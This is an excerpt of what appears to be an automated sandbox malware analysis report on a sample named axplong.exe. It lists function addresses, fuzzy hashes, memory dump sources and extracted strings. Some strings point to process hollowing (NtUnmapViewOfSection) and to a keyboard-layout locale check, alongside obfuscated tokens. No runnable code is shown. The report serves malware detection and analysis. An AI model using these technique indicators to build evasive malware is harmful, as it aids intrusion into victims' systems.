Opcode Fuzzy Hash: 97ae38a12e58adf7ec5dfbbab38985766e01699f6f0cd8687d20f972b27eb704
Instruction Fuzzy Hash: DD5153B3A282145FE3046E69DC88376B7D5EB84320F1B453EEAC8D7784E9395C0587C6

Function 002508D9 Relevance: .2, Instructions: 229
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000003.00000001.2106477899.00000000001DB000.00000040.00000001.01000000.00000007.sdmp, Offset: 001DB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_1db000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 074f507ca58a85fae451463922ba7e42d384a2743b6020c4e60e90f57b9b00dc
Instruction ID: 2b357abad501f8622eab2df01311ebf95f4b83a4915b5f051d5a14109ffef815
Opcode Fuzzy Hash: 074f507ca58a85fae451463922ba7e42d384a2743b6020c4e60e90f57b9b00dc
Instruction Fuzzy Hash: 4461F8F3A082005FE308AE29DC4577AFBD6DBD4720F1B853DDAC9C3784E97958054696

Function 0025CD0C Relevance: .2, Instructions: 172
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000003.00000001.2106477899.00000000001DB000.00000040.00000001.01000000.00000007.sdmp, Offset: 001DB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_1db000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 824270e361319cb5d489c284eeac28b74237da89317eb861e33ba443abf51e01
Instruction ID: 399ab2843eb22f091d717995e1ee8af9051d0c2bcd2310170b291beda81b7198
Opcode Fuzzy Hash: 824270e361319cb5d489c284eeac28b74237da89317eb861e33ba443abf51e01
Instruction Fuzzy Hash: BB515AF3A185105BF3045939DD957AAB6D2EBD4720F2B873DEAC8D7BC4D93C98028581

Function 00243E4A Relevance: .2, Instructions: 170
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000003.00000001.2106477899.00000000001DB000.00000040.00000001.01000000.00000007.sdmp, Offset: 001DB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_1db000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7c4a8bd9c9e3279b88c8c5a4b00b41d03bfb6240159b585d34c30f8f031ec00
Instruction ID: 778f42ea82dd15cae25cabf429b6cdc5f4db1144f2cd1172e92089fdc7763a56
Opcode Fuzzy Hash: d7c4a8bd9c9e3279b88c8c5a4b00b41d03bfb6240159b585d34c30f8f031ec00
Instruction Fuzzy Hash: 914168F3E182151BF314592DEC84766B2DADBD4320F2F863D9A88E77C4E8B99C0642D5

Function 00218794 Relevance: .2, Instructions: 154
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000003.00000001.2106477899.00000000001DB000.00000040.00000001.01000000.00000007.sdmp, Offset: 001DB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_1db000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e05889bad12067f352ddd215ae4058844b0ad4572bc5ed509b3f5221743fb94e
Instruction ID: aa3b46719230a9f21c65953685b7c5fd0a1de497996e488f880f5f23b6ff7027
Opcode Fuzzy Hash: e05889bad12067f352ddd215ae4058844b0ad4572bc5ed509b3f5221743fb94e
Instruction Fuzzy Hash: 48515BB3F212294BF3544A38CC983A23653DB95304F2F4178CB486B7D6D93E5D0AA384

Function 002642F8 Relevance: .2, Instructions: 153COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000001.2106477899.00000000001DB000.00000040.00000001.01000000.00000007.sdmp, Offset: 001DB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_1db000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b23cd938605ea95a6fb86c0d172475a50e269f9a89b3d8da230a84ddddc85b5
Instruction ID: 41ba435847f1112fd257d9979840bc68eb6c7c91504d0dd6b835666fc9d270ca
Opcode Fuzzy Hash: 3b23cd938605ea95a6fb86c0d172475a50e269f9a89b3d8da230a84ddddc85b5
Instruction Fuzzy Hash: 8541D3F390C2189BE304BE699C457BAFBD9EB94760F2B453DEA84D3640EA7559008286

Function 00267A60 Relevance: .1, Instructions: 137COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000001.2106477899.00000000001DB000.00000040.00000001.01000000.00000007.sdmp, Offset: 001DB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_1db000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf29770a765af0ae0321d5d9a79df841edde54f7510cad58cc0815b35b7dbf78
Instruction ID: de1e6643bf911047e27c21c05105d8acae6b81c054e6cf905745de1ccdee0cad
Opcode Fuzzy Hash: cf29770a765af0ae0321d5d9a79df841edde54f7510cad58cc0815b35b7dbf78
Instruction Fuzzy Hash: 5A4126F3A186045BF3086929EC55776BBDAD7C5330F2B863DD688933C8ED7A5C01428A

Function 002A522B Relevance: .1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000001.2106477899.00000000001DB000.00000040.00000001.01000000.00000007.sdmp, Offset: 001DB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_1db000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c458e229ee068dbf9563458a22ea6f05cc6949b6ad0f65961ccde396c28eb4f
Instruction ID: 510f6f074b44b3955c6e483ab17e900723c470ee84b709112c776fa63df40a1e
Opcode Fuzzy Hash: 7c458e229ee068dbf9563458a22ea6f05cc6949b6ad0f65961ccde396c28eb4f
Instruction Fuzzy Hash: DB41A1B2A1C6148FE3097F68D88537AB7E1EF94311F16493CD6C58B244EA355884CB8B

Function 00280153 Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000001.2106477899.00000000001DB000.00000040.00000001.01000000.00000007.sdmp, Offset: 001DB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_1db000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8925992cdd85ebfe3aeb67870a31f24393d778ad5f431fab6c5f418ecde5875b
Instruction ID: bf6c993a1b5027047b093353915ab8be836ab8e90962ff977e5ab708f59dabaa
Opcode Fuzzy Hash: 8925992cdd85ebfe3aeb67870a31f24393d778ad5f431fab6c5f418ecde5875b
Instruction Fuzzy Hash: 194191F3E082109BF3146E19DC857AAB7E6EFA4720F1B453CDBD857380EA395C018686

Function 001E2266 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000001.2106477899.00000000001DB000.00000040.00000001.01000000.00000007.sdmp, Offset: 001DB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_1db000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ad60ed5efdd4bb6327eb9b9c7c2649ebd32e1c63fa469b95d00945ef99f429a
Instruction ID: 9545a5e528ff361467016a47953d8e424b48c00e923a4f3032cfabde932a2871
Opcode Fuzzy Hash: 8ad60ed5efdd4bb6327eb9b9c7c2649ebd32e1c63fa469b95d00945ef99f429a
Instruction Fuzzy Hash: 3D4103B3F5162547F3188D79CC993A16683DBD1324F2F427D8E499B7C2D87E6C0A6280

Function 001DCB57 Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000001.2106477899.00000000001DB000.00000040.00000001.01000000.00000007.sdmp, Offset: 001DB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_1db000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ea9cc837a4abbc0511d7ca5e6762ad42c1eeee13b4dc9d4f192bbbf7561b729
Instruction ID: 480af5a38ade7bed45d9191eee7e0d9873e6a16b725eafa901bc902a810b7e52
Opcode Fuzzy Hash: 4ea9cc837a4abbc0511d7ca5e6762ad42c1eeee13b4dc9d4f192bbbf7561b729
Instruction Fuzzy Hash: 44317776D0D2A74FD31A5E7898912AA7FA0EB06300F2B093BC986DB342E7580C05D7D2

Function 00234E33 Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000001.2106477899.00000000001DB000.00000040.00000001.01000000.00000007.sdmp, Offset: 001DB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_1db000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eca8befd543a305c069441b2224e2ff7a7e22bde797b45c870e47c87fe243dab
Instruction ID: b8267c42c44015f26ab8b8f72160cab03debe405444c5ece5b6bd787a59f304d
Opcode Fuzzy Hash: eca8befd543a305c069441b2224e2ff7a7e22bde797b45c870e47c87fe243dab
Instruction Fuzzy Hash: 0D31F4B2A093089FE3107E2DDC8562AF7E9FB94310F06493CDAD0C3384EA3469548A93

Function 001DCB8B Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000001.2106477899.00000000001DB000.00000040.00000001.01000000.00000007.sdmp, Offset: 001DB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_1db000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a979aefefe5183e420d462bbce0f7e823408e80f74830f1ffe3464386a9a5f5
Instruction ID: e250404300659c4e6119fa8f63d38f6f1a3e0161de32b2d3cf0d18ff19b49082
Opcode Fuzzy Hash: 7a979aefefe5183e420d462bbce0f7e823408e80f74830f1ffe3464386a9a5f5
Instruction Fuzzy Hash: 8B314576D0D7675FD71A9E7488512AA7FA0EB06300F27093BDE92DB782E6690C05C3D2

Function 001DCBE1 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000001.2106477899.00000000001DB000.00000040.00000001.01000000.00000007.sdmp, Offset: 001DB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_1db000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aebbaf2af36ce7c11c00c51a540cf569b1c0ba2e0c92c393498615a48c026735
Instruction ID: 3cdb1648427dd5ea1b5f194af509df0f1be9c75af0a3eae454855b4dc840d4cd
Opcode Fuzzy Hash: aebbaf2af36ce7c11c00c51a540cf569b1c0ba2e0c92c393498615a48c026735
Instruction Fuzzy Hash: 9D213776C0D7A24FD31A5AB45C552697FA1AB06300F2B057BD9969F342E6580C05C3D2

Analysis Process: axplong.exePID: 6664, Parent PID: 1068COMMON

Execution Graph

Execution Coverage:	13.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	1.7%
Total number of Nodes:	360
Total number of Limit Nodes:	27

Executed Functions

Function 0017E440 Relevance: 14.8, Strings: 11, Instructions: 1000
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

WWp=, xrefs: 001804DA
111, xrefs: 0017F6B0
GqKudSO2, xrefs: 0017E47F
WWt=, xrefs: 0018088D
MT==, xrefs: 0017E4A5
WGt=, xrefs: 0017F62D, 0017F90A
fed3aa, xrefs: 0017FA9E
UD==, xrefs: 0017EA1F, 0017EC66
#, xrefs: 00180534
MJB+, xrefs: 0017E734
246122658369, xrefs: 0017F647, 0017F924, 001804F7, 001808AA

Memory Dump Source

Source File: 00000006.00000002.3374291733.0000000000171000.00000040.00000001.01000000.00000007.sdmp, Offset: 00170000, based on PE: true

Associated: 00000006.00000002.3374186520.0000000000170000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3374291733.00000000001D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3374930439.00000000001D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.00000000001DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.000000000035D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.000000000043E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.0000000000472000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.0000000000479000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.0000000000488000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3378162944.0000000000489000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379223943.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379398824.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379510236.0000000000628000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379614939.0000000000629000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_170000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID: #$111$246122658369$GqKudSO2$MJB+$MT==$UD==$WGt=$WWp=$WWt=$fed3aa
API String ID: 0-214772295
Opcode ID: 712571141b648dc0ce58203ca0f21bd782b82ca069fb9e81dfc953aa9481c884
Instruction ID: b953b7aef4e685017a5ce164d84f2d39c500506407b692f38b9fb26cf6ae76fb
Opcode Fuzzy Hash: 712571141b648dc0ce58203ca0f21bd782b82ca069fb9e81dfc953aa9481c884
Instruction Fuzzy Hash: 0282D270904248DBEF14EF68C9597DEBBB6AB16304F608189E815673C2C7759B88CFD2

Function 04B80C94 Relevance: 1.3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

Strings

KD;m, xrefs: 04B80CDD

Memory Dump Source

Source File: 00000006.00000002.3408905670.0000000004B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4b80000_axplong.jbxd

Similarity

API ID:
String ID: KD;m
API String ID: 0-359913441
Opcode ID: 91ff1ee4de05b9de862c039a1ed68ac7407260c1d60d5c11cd1577c832218340
Instruction ID: 0f6e6c98a22d385d96588bc54ca7e780ac2e3a0a08983f0434030aac8b211ae8
Opcode Fuzzy Hash: 91ff1ee4de05b9de862c039a1ed68ac7407260c1d60d5c11cd1577c832218340
Instruction Fuzzy Hash: 6301D6AB34D110BE6142744967106F6676EE3D737033284AAFC47C5601E6D43A9DF632

Function 04B80CB6 Relevance: 1.3, Strings: 1, Instructions: 69COMMON

Download Yara Rule

Strings

KD;m, xrefs: 04B80CDD

Memory Dump Source

Source File: 00000006.00000002.3408905670.0000000004B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4b80000_axplong.jbxd

Similarity

API ID:
String ID: KD;m
API String ID: 0-359913441
Opcode ID: 9515f97eff140cac669f91e39fb5e2241d195113534632519adc753bd00dfae4
Instruction ID: 8c5f35973fe2abada0240efe3564141731592d28161f8de64b731a0659d9a552
Opcode Fuzzy Hash: 9515f97eff140cac669f91e39fb5e2241d195113534632519adc753bd00dfae4
Instruction Fuzzy Hash: EE01479B38D110AD6642719517107F26A69F3D33B033244AFFC4789A02B6D83A9DF632

Function 04B80CF0 Relevance: 1.3, Strings: 1, Instructions: 68COMMON

Download Yara Rule

Strings

KD;m, xrefs: 04B80CDD

Memory Dump Source

Source File: 00000006.00000002.3408905670.0000000004B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4b80000_axplong.jbxd

Similarity

API ID:
String ID: KD;m
API String ID: 0-359913441
Opcode ID: 0cc4f93ead6aa4cd822e424ecbe4c097dc1f9ff7e6f25aa888c143701293f618
Instruction ID: 3805369bd811c008621ca008507643ce4e2c34ff0d3a46368fb1d9e9d2c2b2e5
Opcode Fuzzy Hash: 0cc4f93ead6aa4cd822e424ecbe4c097dc1f9ff7e6f25aa888c143701293f618
Instruction Fuzzy Hash: 9D0147D734D110BE6542359157146F66669F3E33B033284AEFC43C5A02B6C87A8DF632

Function 04B80CD0 Relevance: 1.3, Strings: 1, Instructions: 60COMMON

Download Yara Rule

Strings

KD;m, xrefs: 04B80CDD

Memory Dump Source

Source File: 00000006.00000002.3408905670.0000000004B80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4b80000_axplong.jbxd

Similarity

API ID:
String ID: KD;m
API String ID: 0-359913441
Opcode ID: 8c6fc60017655c58c8ef6a094faa5450ae88cd173c434e1e138c52a552f0103a
Instruction ID: 5f3ffa46776f3a99e930a2c8b31aff6f454df40c762674fb11c5ee770d0a043a
Opcode Fuzzy Hash: 8c6fc60017655c58c8ef6a094faa5450ae88cd173c434e1e138c52a552f0103a
Instruction Fuzzy Hash: 0EF04CDB38C110BDA24271455710AF666A9E3D337033284AEFC47C5502B6D83A9DF332

Function 0018D312 Relevance: .2, Instructions: 172COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 0017247E

Memory Dump Source

Source File: 00000006.00000002.3374291733.0000000000171000.00000040.00000001.01000000.00000007.sdmp, Offset: 00170000, based on PE: true

Associated: 00000006.00000002.3374186520.0000000000170000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3374291733.00000000001D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3374930439.00000000001D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.00000000001DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.000000000035D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.000000000043E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.0000000000472000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.0000000000479000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.0000000000488000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3378162944.0000000000489000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379223943.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379398824.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379510236.0000000000628000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379614939.0000000000629000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_170000_axplong.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID:
API String ID: 2659868963-0
Opcode ID: ed2ea9621830b1fdf43eef0286515214481a0afda79487b482502e55c4d5172d
Instruction ID: 5a78592bf8fa6aeb263bab706f2bdec978b5fe14b698c5a09043d0ec9acf0af2
Opcode Fuzzy Hash: ed2ea9621830b1fdf43eef0286515214481a0afda79487b482502e55c4d5172d
Instruction Fuzzy Hash: BC51AEB19027058FDB19DF95E8C17AEBBF1FB18310F24866AE805EB690D7749A80CF50

Function 00183550 Relevance: 51.5, APIs: 1, Strings: 28, Instructions: 761
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0018425F

Part of subcall function 00187870: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 0018795C
Part of subcall function 00187870: __Cnd_destroy_in_situ.LIBCPMT ref: 00187968
Part of subcall function 00187870: __Mtx_destroy_in_situ.LIBCPMT ref: 00187971

Strings

invalid stoi argument, xrefs: 00182DE9, 00182DF8, 0018425A, 00184E9D
JB6, xrefs: 001853F5
Vp 6, xrefs: 00185447
mP=, xrefs: 00186383
V5Qk, xrefs: 00183DC0
MJB+, xrefs: 00184776, 001847ED, 00184A95, 00184B0C
96B6, xrefs: 00185470
5F6, xrefs: 00185497
W07l, xrefs: 00183AEE
V0x6, xrefs: 0018541E
stoi argument out of range, xrefs: 00182E02, 00184269, 00184EAC
aqB6, xrefs: 001854DB
aZT6, xrefs: 001853CC
V0N6, xrefs: 0018537A
MJF+, xrefs: 001847BD, 001848EC, 00184ADC, 00184C0B
9KN6, xrefs: 00185351
8ZF6, xrefs: 00185502
9526, xrefs: 0018531D
6F9fr==, xrefs: 00184712
", xrefs: 00183E99
Fz==, xrefs: 0018369E, 00184D2D
WJms, xrefs: 00183BD9
KFT0PL==, xrefs: 001854B9
HBhr, xrefs: 0018378F
fed3aa, xrefs: 00185489
WJP6, xrefs: 001853A3
5120, xrefs: 00183ABF, 00183BAA
246122658369, xrefs: 00181EA5, 001827EE, 00182A43, 00182AB0, 00182E88, 00183373, 001833D4, 00184F3A, 00184F4D, 00184F8F, 00184F99, 001854F4

Memory Dump Source

Source File: 00000006.00000002.3374291733.0000000000171000.00000040.00000001.01000000.00000007.sdmp, Offset: 00170000, based on PE: true

Associated: 00000006.00000002.3374186520.0000000000170000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3374291733.00000000001D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3374930439.00000000001D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.00000000001DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.000000000035D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.000000000043E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.0000000000472000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.0000000000479000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.0000000000488000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3378162944.0000000000489000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379223943.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379398824.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379510236.0000000000628000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379614939.0000000000629000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_170000_axplong.jbxd

Yara matches

Similarity

API ID: Cnd_destroy_in_situCnd_unregister_at_thread_exitMtx_destroy_in_situXinvalid_argumentstd::_
String ID: 5F6$ 6F9fr==$ JB6$ mP=$"$246122658369$5120$8ZF6$9526$96B6$9KN6$Fz==$HBhr$KFT0PL==$MJB+$MJF+$V0N6$V0x6$V5Qk$Vp 6$W07l$WJP6$WJms$aZT6$aqB6$fed3aa$invalid stoi argument$stoi argument out of range
API String ID: 4234742559-3875209911
Opcode ID: 382115e51edb975c3a8945915e93556fa760135e231c738080e676eaffd289c8
Instruction ID: 79dc7ff9b5c6bde1be1e000320dc96a720d9c58c7c3200c8a06b89ddb8ff14ef
Opcode Fuzzy Hash: 382115e51edb975c3a8945915e93556fa760135e231c738080e676eaffd289c8
Instruction Fuzzy Hash: 10520471A002489BDF18FF78CC4A79DBB76AF56304F644189E415A72C2DB359B84CFA2

Function 001846C0 Relevance: 28.7, Strings: 21, Instructions: 2484COMMON

Download Yara Rule

APIs

Part of subcall function 00187870: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 0018795C
Part of subcall function 00187870: __Cnd_destroy_in_situ.LIBCPMT ref: 00187968
Part of subcall function 00187870: __Mtx_destroy_in_situ.LIBCPMT ref: 00187971

std::_Xinvalid_argument.LIBCPMT ref: 00184EA2

Strings

JB6, xrefs: 001853F5
aZT6, xrefs: 001853CC
Vp 6, xrefs: 00185447
mP=, xrefs: 00186383, 00186652
V0N6, xrefs: 0018537A
MJF+, xrefs: 001847BD, 001848EC, 00184ADC, 00184C0B
MJB+, xrefs: 00184776, 001847ED, 00184A95, 00184B0C
96B6, xrefs: 00185470
9KN6, xrefs: 00185351
8ZF6, xrefs: 00185502
5F6, xrefs: 00185497
9526, xrefs: 0018531D
6F9fr==, xrefs: 00184712
V0x6, xrefs: 0018541E
Fz==, xrefs: 0018369E, 00184D2D
stoi argument out of range, xrefs: 00184269, 00184EAC
KFT0PL==, xrefs: 001854B9
aqB6, xrefs: 001854DB
fed3aa, xrefs: 00185489
WJP6, xrefs: 001853A3
246122658369, xrefs: 00184F3A, 00184F4D, 00184F8F, 00184F99, 001854F4

Memory Dump Source

Source File: 00000006.00000002.3374291733.0000000000171000.00000040.00000001.01000000.00000007.sdmp, Offset: 00170000, based on PE: true

Associated: 00000006.00000002.3374186520.0000000000170000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3374291733.00000000001D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3374930439.00000000001D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.00000000001DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.000000000035D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.000000000043E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.0000000000472000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.0000000000479000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.0000000000488000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3378162944.0000000000489000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379223943.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379398824.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379510236.0000000000628000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379614939.0000000000629000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_170000_axplong.jbxd

Yara matches

Similarity

API ID: Cnd_destroy_in_situCnd_unregister_at_thread_exitMtx_destroy_in_situXinvalid_argumentstd::_
String ID: 5F6$ 6F9fr==$ JB6$ mP=$246122658369$8ZF6$9526$96B6$9KN6$Fz==$KFT0PL==$MJB+$MJF+$V0N6$V0x6$Vp 6$WJP6$aZT6$aqB6$fed3aa$stoi argument out of range
API String ID: 4234742559-1662704651
Opcode ID: c7b70efbb26fa592676e26a00c594b72dd3bd69695f4f73395871f6d6d2c33f4
Instruction ID: 42567bb3c1a88ba00684090aaa02bb7cd1b31d65ba94ea2939f97d89cd97a49c
Opcode Fuzzy Hash: c7b70efbb26fa592676e26a00c594b72dd3bd69695f4f73395871f6d6d2c33f4
Instruction Fuzzy Hash: 0B233671E002589BEB19EB28CD997ADBB769F92304F5481D8E008A72C6DB359FC4CF51

Function 001758F0 Relevance: 17.8, Strings: 14, Instructions: 288
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

invalid stoi argument, xrefs: 00177060
ntdll.dll, xrefs: 0017715D
00000423, xrefs: 0017600A
00000422, xrefs: 00175FD9
0000043f, xrefs: 0017603B
(, xrefs: 00177206
IVKsgL==, xrefs: 001767A1
RBPleCSm, xrefs: 0017666C
GVQsgL==, xrefs: 001766F8
stoi argument out of range, xrefs: 00177051
NtUnmapViewOfSection, xrefs: 00177158
, xrefs: 00177140
00000419, xrefs: 00175FA8
Keyboard Layout\Preload, xrefs: 00175F64

Memory Dump Source

Source File: 00000006.00000002.3374291733.0000000000171000.00000040.00000001.01000000.00000007.sdmp, Offset: 00170000, based on PE: true

Associated: 00000006.00000002.3374186520.0000000000170000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3374291733.00000000001D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3374930439.00000000001D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.00000000001DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.000000000035D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.000000000043E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.0000000000472000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.0000000000479000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.0000000000488000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3378162944.0000000000489000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379223943.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379398824.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379510236.0000000000628000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379614939.0000000000629000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_170000_axplong.jbxd

Yara matches

Similarity

API ID:
